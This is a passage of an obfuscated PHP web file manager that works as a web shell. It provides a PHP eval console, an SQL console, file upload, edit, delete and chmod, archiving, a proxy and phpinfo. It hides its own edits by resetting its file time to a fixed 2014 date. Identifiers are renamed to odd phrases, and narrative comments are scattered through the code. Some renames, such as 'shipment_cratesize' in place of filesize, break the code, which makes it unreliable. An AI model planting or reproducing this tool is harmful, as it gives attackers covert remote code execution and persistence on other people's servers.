		             $result_onmeoh = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result_onmeoh);

		             echo $result_onmeoh;

		             die();
	} 
}

?>

<!doctype html>
                 
<html>
                   
<head>     

	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
                
    <title><?=__('File manager')?></title>
<style>

body {

	background-color:	white;

	font-family:		             Verdana, Arial, Helvetica, sans-serif;
                  
	font-size:		             	8pt;

	margin:		             		             0px;

}


a:link, a:active, a:visited { color: #006699; text-decoration: none; }
                    
a:hover { color: #DD6900; text-decoration: underline; }

a.th:link { color: #FFA34F; text-decoration: none; }

a.th:active { color: #FFA34F; text-decoration: none; }
                  
a.th:visited { color: #FFA34F; text-decoration: none; }

a.th:hover {  color: #FFA34F; text-decoration: underline; }


                    
table.bg {

	background-color: #ACBBC6

}


th, td { 
                
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
                   
	padding: 3px;

}



th	{
	height:		             		             25px;

	background-color:	#006699;

	color:		             		             #FFA34F;

	font-weight:		             bold;

	font-size:		             	11px;
}


.row1 {
	background-color:	#EFEFEF;
}



.row2 {

	background-color:	#DEE3E7;
                    
}


                   
.row3 {

	background-color:	#D1D7DC;
                    
	padding: 5px;

}


tr.row1:hover {

	background-color:	#F3FCFC;
                   
}


                
tr.row2:hover {
                  
	background-color:	#F0F6F6;

}
                  

.whole {
	width: 100%;
                  
}
                

.all tbody td:first-child{width:100%;}
                    

                 
textarea {

	font: 9pt 'Courier New', courier;

	line-height: 125%;

	padding: 5px;
                    
}



.textarea_input {

	height: 1em;
                   
}
                   

.textarea_input:focus {

	height: auto;
                 
}



input[type=submit]{
	background: #FCFCFC none !important;
                    
	cursor: pointer;
}

                 
.folder {
                  
    background-image: url("");

}
                

.file {

    background-image: url("");

}

<?=fm_home_style()?>
                  
.img {
                   
	background-image: 
url("");
}
                  
@media screen and (max-width:720px){
                
  table{display:block;}
                 
    #fm_table td{display:inline;float:left;}
                  
    #fm_table tbody td:first-child{width:100%;padding:0;}

    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}

    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}

	#topdomain_table .row2, #topdomain_table .row3 {display:inline;float:left;width:100%;padding:0;}

	#topdomain_table table td {display:inline;float:left;}
}
                    
</style>

</head>
                
<body>

<?php

$url_inc = '?fm=true';

if (isset($_POST['sqlrun'])&&!empty($jski_config['enable_sql_console'])){
                  
	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';

} elseif (isset($_POST['phprun'])&&!empty($jski_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';

} 
if (isset($_GET['fm_settings'])) {

	echo ' 
<table class="whole">

<form method="post" action="">

<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>

'.(empty($msg_oshin)?'':'<tr><td class="row2" colspan="2">'.$msg_oshin.'</td></tr>').'
'.jski_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.jski_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
                  
'.jski_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'

'.jski_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.jski_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'

'.jski_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.jski_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'

'.jski_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
                
'.jski_config_checkbox_row(__('Show').' xls','show_xls').'

'.jski_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'

'.jski_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'

<tr><td class="row1"><input name="jski_config[sql_server]" value="'.$jski_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>

<tr><td class="row1"><input name="jski_config[sql_username]" value="'.$jski_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>

<tr><td class="row1"><input name="jski_config[sql_password]" value="'.$jski_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="jski_config[sql_db]" value="'.$jski_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.jski_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.jski_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.jski_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'

'.jski_config_checkbox_row(__('Restore file time after editing'),'restore_time').'

'.jski_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'

<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&jski_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="jski_config[fm_set_submit]"></td></tr>
</form>
                    
</table>

<table>
<form method="post" action="">
                   
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>

<tr><td class="row1"><input name="fm_login[auth_loadedmeorize]" value="1" '.($auth_starsme['auth_loadedmeorize']?'checked':'').' type="checkbox" id="auth_loadedme"></td><td class="row2 whole"><label for="auth_loadedme">'.__('Authorization').'</label></td></tr>

<tr><td class="row1"><input name="fm_login[login]" value="'.$auth_starsme['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
                
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth_starsme['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
                 
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth_starsme['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>

<tr><td class="row1"><input name="fm_login[days_auth_loadedmeorizationAppstore]" value="'.$auth_starsme['days_auth_loadedmeorizationAppstore'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>

<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_loadedme_script">'.$auth_starsme['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
                   
</table>';

echo fm_tpl_form('php'),fm_tpl_form('sql');
                
} elseif (isset($proxy_form)) {
	die($proxy_form);
                  
} elseif (isset($res_lng)) {	
?>

<table class="whole">

<tr>

    <th><?=__('File manager').' - '.$path?></th>

</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php

	if($res_lng=='sql') echo ' - Database: '.$jski_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
                 
	else echo '</h2></td><td>'.fm_run_input('sql');

	?></td></tr></table></td>

</tr>

<tr>

    <td class="row1">

		             <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>

		             <form action="" method="POST" name="console">

		             <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
		             <input type="reset" value="<?=__('Reset')?>">

		             <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
                  
$str_tmpl = $res_lng.'_templates';
                  
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';

if (!empty($tmpl)){

	$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
                 
	$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";

	$select .= '<option value="-1">' . __('Select') . "</option>\n";
                   
	foreach ($tmpl as $key=>$value){
		             $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	}

	$select .= "</select>\n";

	echo $select;

}

?>

		             </form>
	</td>

</tr>
</table>

<?php

	if (!empty($res)) {
		             $fun='fm_'.$res_lng;

		             echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}

} elseif (!empty($_REQUEST['edit'])){
                 
	if(!empty($_REQUEST['save'])) {

		             $fn = $path . $_REQUEST['edit'];

		             $filemtime = filemtime($fn);

	    if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_oshin .= __('File updated');
                   
		             else $msg_oshin .= __('Error occurred');
                  
		             if ($_GET['edit']==basename(__FILE__)) {

		             	touch(__FILE__,1415116371);

		             } else {

		             	if (!empty($jski_config['restore_time'])) touch($fn,$filemtime);
		             }

	}

    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);

    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

?>

<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
                  
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
                   
</tr>
<tr>
                
    <td class="row1">

        <?=$msg_oshin?>
	</td>

</tr>
<tr>

    <td class="row1">

        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>

	</td>
                  
</tr>
<tr>
    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$editlink?>">
                
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
                
            <input type="submit" name="save" value="<?=__('Submit')?>">
                    
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">

        </form>
                    
    </td>

</tr>

</table>

<?php

echo $auth_starsme['script'];
                    
} elseif(!empty($_REQUEST['rights'])){

	if(!empty($_REQUEST['save'])) {

	    if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
                    
		             $msg_oshin .= (__('File updated')); 
		             else $msg_oshin .= (__('Error occurred'));

	}
                    
	clearstatcache();
                   
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);

    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;

    $backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">

<tr>

    <th><?=__('File manager').' - '.$path?></th>
                
</tr>

<tr>
    <td class="row1">

        <?=$msg_oshin?>

	</td>
</tr>

<tr>

    <td class="row1">
                
        <a href="<?=$backlink?>"><?=__('Back')?></a>
                    
	</td>
                 
</tr>

<tr>

    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
                
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>

        <?php } ?>

            <input type="submit" name="save" value="<?=__('Submit')?>">

        </form>
    </td>

</tr>

</table>
                
<?php
                    
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {

	if(!empty($_REQUEST['save'])) {
                
	    rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
		             $msg_oshin .= (__('File updated'));

		             $_REQUEST['rename'] = $_REQUEST['newname'];

	}
	clearstatcache();

    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

                 
?>
<table class="whole">

<tr>
                  
    <th><?=__('File manager').' - '.$path?></th>
</tr>

<tr>

    <td class="row1">

        <?=$msg_oshin?>

	</td>
                  
</tr>
                    
<tr>

    <td class="row1">

        <a href="<?=$backlink?>"><?=__('Back')?></a>

	</td>
                  
</tr>

<tr>

    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$link?>">

            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
                    
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
                    
</tr>
</table>

<?php
} else {

// $ext stands for deals made and forgotten  

    $msg_oshin = '';

    if(!empty($_FILES['upload'])&&!empty($jski_config['upload_file'])) {

        if(!empty($_FILES['upload']['name'])){

            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                 
                $msg_oshin .= __('Error occurred');
                   
            } else {

		             		             $msg_oshin .= __('Files uploaded').': '.$_FILES['upload']['name'];
		             	}
        }
                    
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {

        if(!fm_del_shipment_crates(($path . $_REQUEST['delete']), true)) {

            $msg_oshin .= __('Error occurred');
        } else {
                    
		             	$msg_oshin .= __('Deleted').' '.$_REQUEST['delete'];

		             }
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($jski_config['make_directory'])) {

        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {

            $msg_oshin .= __('Error occurred');
                   
        } else {
                   
		             	$msg_oshin .= __('Created').' '.$_REQUEST['dirname'];

		             }
    } elseif(!empty($_POST['search_recursive'])) {
		             ini_set('max_execution_time', '0');
		             $search_data =  find_text_in_shipment_crates($_POST['path'], $_POST['mask'], $_POST['search_recursive']);

		             if(!empty($search_data)) {

		             	$msg_oshin .= __('Found in shipment_crates').' ('.count($search_data).'):<br>';

		             	foreach ($search_data as $filename) {

		             		             $msg_oshin .= '<a href="'.fm_url(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

		             	}
                 
		             } else {
		             	$msg_oshin .= __('Nothing founded');

		             }	
	} elseif(!empty($_REQUEST['mkfile'])&&!empty($jski_config['new_file'])) {

        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

            $msg_oshin .= __('Error occurred');
        } else {
                   
		             	fclose($fp);

		             	$msg_oshin .= __('Created').' '.$_REQUEST['filename'];

		             }

    } elseif (isset($_GET['zip'])) {
                  
		             $source = base64_decode($_GET['zip']);
		             $destination = basename($source).'.zip';

		             set_time_limit(0);

		             $phar = new PharData($destination);

		             $phar->buildFromDirectory($source);
		             if (is_file($destination))
                    
		             $msg_oshin .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').
                 
		             '.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                 
		             .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';

		             else $msg_oshin .= __('Error occurred').': '.__('no shipment_crates');

	} elseif (isset($_GET['gz'])) {
		             $source = base64_decode($_GET['gz']);

		             $archive = $source.'.tar';
                 
		             $destination = basename($source).'.tar';

		             if (is_file($archive)) unlink($archive);
		             if (is_file($archive.'.gz')) unlink($archive.'.gz');
                   
		             clearstatcache();

		             set_time_limit(0);
                 
		             //die();
		             $phar = new PharData($destination);

		             $phar->buildFromDirectory($source);

		             $phar->compress(Phar::GZ,'.tar.gz');

		             unset($phar);
		             if (is_file($archive)) {
		             	if (is_file($archive.'.gz')) {

		             		             unlink($archive); 
                    
		             		             $destination .= '.gz';
		             	}
                    


		             	$msg_oshin .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		             	'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)

		             	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		             } else $msg_oshin .= __('Error occurred').': '.__('no shipment_crates');

	} elseif (isset($_GET['decompress'])) {
		             // $source = base64_decode($_GET['decompress']);

		             // Echo the silence after the final sit-down  

		             // $ext = end(explode(".", $destination));

		             // if ($ext=='zip' OR $ext=='gz') {
                    
		             	// $phar = new PharData($source);
                
		             	// $phar->decompress();
		             	// $base_file = str_replace('.'.$ext,'',$destination);
                 
		             	// $destination is never where you planned  
                   
		             	// if ($ext=='tar'){

		             		             // $phar = new PharData($base_file);

		             		             // $phar->extractTo(dir($source));
		             	// }
		             // } 
                 
		             //1 missed sign and everything comes crashing down  
	} elseif (isset($_GET['gzfile'])) {

		             $source = base64_decode($_GET['gzfile']);

		             $archive = $source.'.tar';

		             $destination = basename($source).'.tar';

		             if (is_file($archive)) unlink($archive);

		             if (is_file($archive.'.gz')) unlink($archive.'.gz');
		             set_time_limit(0);

		             // $msg_oshin from the Don echoes forever  

		             $ext_arr = explode('.',basename($source));
		             if (isset($ext_arr[1])) {
		             	unset($ext_arr[0]);
		             	$ext=implode('.',$ext_arr);

		             } 

		             $phar = new PharData($destination);
		             $phar->addFile($source);
                    
		             $phar->compress(Phar::GZ,$ext.'.tar.gz');
                   
		             unset($phar);

		             if (is_file($archive)) {
		             	if (is_file($archive.'.gz')) {

		             		             unlink($archive); 

		             		             $destination .= '.gz';
		             	}

		             	$msg_oshin .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		             	'.&nbsp;'.fm_link('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                  
		             	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';

		             } else $msg_oshin .= __('Error occurred').': '.__('no shipment_crates');
                  
	}
?>
<table class="whole" id="topdomain_table" >

<tr>
                 
    <th colspan="2"><?=__('File manager')?><?=(!empty($path)?' - '.$path:'')?></th>
                    
</tr>
<?php if(!empty($msg_oshin)){ ?>

<tr>

	<td colspan="2" class="row2"><?=$msg_oshin?></td>

</tr>

<?php } ?>

<tr>
    <td class="row2">
		             <table>
                    
		             	<tr>

		             	<td>

		             		             <?=fm_home()?>

		             	</td>
		             	<td>

		             	<?php if(!empty($jski_config['make_directory'])) { ?>
                    
		             		             <form method="post" action="<?=$url_inc?>">
		             		             <input type="hidden" name="path" value="<?=$path?>" />

		             		             <input type="text" name="dirname" size="15">
		             		             <input type="submit" name="mkdir" value="<?=__('Make directory')?>">
                  
		             		             </form>

		             	<?php } ?>

		             	</td>
		             	<td>
                    
		             	<?php if(!empty($jski_config['new_file'])) { ?>
		             		             <form method="post" action="<?=$url_inc?>">

		             		             <input type="hidden" name="path"     value="<?=$path?>" />

		             		             <input type="text"   name="filename" size="15">
                 
		             		             <input type="submit" name="mkfile"   value="<?=__('New file')?>">

		             		             </form>
                 
		             	<?php } ?>

		             	</td>
                
		             	<td>
                   
		             		             <form  method="post" action="<?=$url_inc?>" style="display:inline">
                  
		             		             <input type="hidden" name="path" value="<?=$path?>" />

		             		             <input type="text" placeholder="<?=__('Recursive search')?>" name="search_recursive" value="<?=!empty($_POST['search_recursive'])?$_POST['search_recursive']:''?>" size="15">
		             		             <input type="text" name="mask" placeholder="<?=__('Mask')?>" value="<?=!empty($_POST['mask'])?$_POST['mask']:'*.*'?>" size="5">
		             		             <input type="submit" name="search" value="<?=__('Search')?>">

		             		             </form>

		             	</td>

		             	<td>

		             	<?=fm_run_input('php')?>

		             	</td>

		             	<td>

		             	<?=fm_run_input('sql')?>

		             	</td>

		             	</tr>
		             </table>

    </td>

    <td class="row3">

		             <table>

		             <tr>
                    
		             <td>
                 
		             <?php if (!empty($jski_config['upload_file'])) { ?>

		             	<form name="form1" method="post" action="<?=$url_inc?>" enctype="multipart/form-data">

		             	<input type="hidden" name="path" value="<?=$path?>" />

		             	<input type="file" name="upload" id="upload_hidden" style="position: absolute; display: block; overflow: hidden; width: 0; height: 0; border: 0; padding: 0;" onchange="document.getElementById('upload_visible').value = this.value;" />

		             	<input type="text" readonly="1" id="upload_visible" placeholder="<?=__('Select the file')?>" style="cursor: pointer;" onclick="document.getElementById('upload_hidden').click();" />

		             	<input type="submit" name="test" value="<?=__('Upload')?>" />
                 
		             	</form>

		             <?php } ?>

		             </td>
		             <td>

		             <?php if ($auth_starsme['auth_loadedmeorize']) { ?>
                   
		             	<form action="" method="post">&nbsp;&nbsp;&nbsp;
                
		             	<input name="quit" type="hidden" value="1">

		             	<?=__('Hello')?>, <?=$auth_starsme['login']?>
                   
		             	<input type="submit" value="<?=__('Quit')?>">
		             	</form>

		             <?php } ?>
		             </td>

		             <td>

		             <?=fm_lang_form($language)?>
                 
		             </td>
                   
		             <tr>

		             </table>

    </td>
                  
</tr>

</table>
                  
<table class="all" border='0' cellspacing='1' cellpadding='1' id="fm_table" width="100%">

<thead>
                  
<tr> 

    <th style="white-space:nowrap"> <?=__('Filename')?> </th>

    <th style="white-space:nowrap"> <?=__('Size')?> </th>

    <th style="white-space:nowrap"> <?=__('Date')?> </th>

    <th style="white-space:nowrap"> <?=__('Rights')?> </th>
                 
    <th colspan="4" style="white-space:nowrap"> <?=__('Manage')?> </th>
                   
</tr>

</thead>
<tbody>
<?php

$elements = fm_scan_dir($path, '', 'all', true);
                  
$dirs = array();

$shipment_crates = array();

foreach ($elements as $file){

    if(@is_dir($path . $file)){
                 
        $dirs[] = $file;
                   
    } else {
                
        $shipment_crates[] = $file;
    }

}
natsort($dirs); natsort($shipment_crates);
                    
$elements = array_merge($dirs, $shipment_crates);


foreach ($elements as $file){
    $filename = $path . $file;

    $filedata = @stat($filename);
    if(@is_dir($filename)){

		             $filedata[7] = '';

		             if (!empty($jski_config['show_dir_size'])&&!fm_root($file)) $filedata[7] = fm_dir_size($filename);
        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
                 
        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);

		             $arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
                    
        $style = 'row2';

		              if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';

    } else {

		             $link = 
                 
		             	$jski_config['show_img']&&@getimagesize($filename) 
                  
		             	? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''

		             	. fm_img_link($filename)

		             	.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
                 
		             	: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
		             $e_arr = explode(".", $file);

		             $ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
                    
		             $arlink = in_array($ext,array('zip','gz','tar')) 

		             ? ''

		             : ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
                 
        $style = 'row1';

		             $alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';

    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
                  
    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>

<tr class="<?=$style?>"> 

    <td><?=$link?></td>

    <td><?=$filedata[7]?></td>
                
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
                    
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>

    <td><?=$arlink?></td>

</tr>

<?php

    }
}
?>

</tbody>
                  
</table>
<div class="row3"><?php
                  
	$mtime = explode(' ', microtime()); 

	$totaltime = $mtime[0] + $mtime[1] - $starttime; 

	echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';

	if (!empty($jski_config['show_php_ver'])) echo ' | PHP '.phpversion();
                 
	if (!empty($jski_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();

	if (!empty($jski_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);

	if (!empty($jski_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';

	if (!empty($jski_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
                 
	if (!empty($jski_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
                    
	if (!empty($jski_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';

	?>

</div>

<script type="text/javascript">

function download_xls(filename, text) {
                   
	var element = document.createElement('a');
                    
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
                  
	element.setAttribute('download', filename);

	element.style.display = 'none';
                    
	document.body.appendChild(element);
	element.click();
                  
	document.body.removeChild(element);
                
}

                  
function base64_encode(m) {
                 
	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
		             c = m.charCodeAt(l);

		             if (128 > c) d = 1;
                
		             else
		             	for (d = 2; c >= 2 << 5 * d;) ++d;
                
		             for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
                 
	}
	b && (g += k[f << 6 - b]);
	return g
}
                   

                   

var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',

    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
                    
    format = function(s, c) {

            return s.replace(/{(\w+)}/g, function(m, p) {

                return c[p];
            })

        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)

        var ctx = {

            worksheet: name || 'Worksheet',

            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }

		             t = new Date();
		             filename = 'fm_' + t.toISOString() + '.xls'
                    
		             download_xls(filename, base64_encode(format(template, ctx)))

    }
                    
})();



var table2Excel = function () {


    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");



	this.CreateExcelSheet = 

		             function(el, name){
		             	if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer


		             		             var x = document.getElementById(el).rows;
                 


		             		             var xls = new ActiveXObject("Excel.Application");
                  


		             		             xls.visible = true;

		             		             xls.Workbooks.Add
		             		             for (i = 0; i < x.length; i++) {

		             		             	var y = x[i].cells;
                

		             		             	for (j = 0; j < y.length; j++) {

		             		             		             xls.Cells(i + 1, j + 1).Value = y[j].innerText;

		             		             	}

		             		             }

		             		             xls.Visible = true;

		             		             xls.UserControl = true;
		             		             return xls;
		             	} else {

		             		             tableToExcelData(el, name);

		             	}

		             }

}

</script>

</body>
</html>

<?php

// Let’s pretend the war never left the table  
class archiveTar {

	var $lalo_ledger = '';
                   
	var $stash_draft = 0;

	var $marker_in_manifest = 0;

	var $under_fake_identity = true;
                    
	var $deal_gone_bad = array();
	var $shipment_crates = array();

	

	function __construct(){
		             if (!isset($this->deal_gone_bad)) $this->deal_gone_bad = array();

	}

	
                
	function charm_the_record($file_list){

		             $result_onmeoh = false;

		             if (file_exists($this->lalo_ledger) && is_file($this->lalo_ledger)) 	$newArchive = false;

		             else $newArchive = true;

		             if ($newArchive){

		             	if (!$this->open_spellbook()) return false;

		             } else {

		             	if (shipment_cratesize($this->lalo_ledger) == 0)	return $this->open_spellbook();
                 
		             	if ($this->under_fake_identity) {
                    
		             		             $this->shut_the_grimoire();

		             		             if (!rename($this->lalo_ledger, $this->lalo_ledger.'.tmp')){

		             		             	$this->deal_gone_bad[] = __('Cannot rename').' '.$this->lalo_ledger.__(' to ').$this->lalo_ledger.'.tmp';
                 
		             		             	return false;
                
		             		             }
                 
		             		             $tmpArchive = gzopen($this->lalo_ledger.'.tmp', 'rb');
                  
		             		             if (!$tmpArchive){

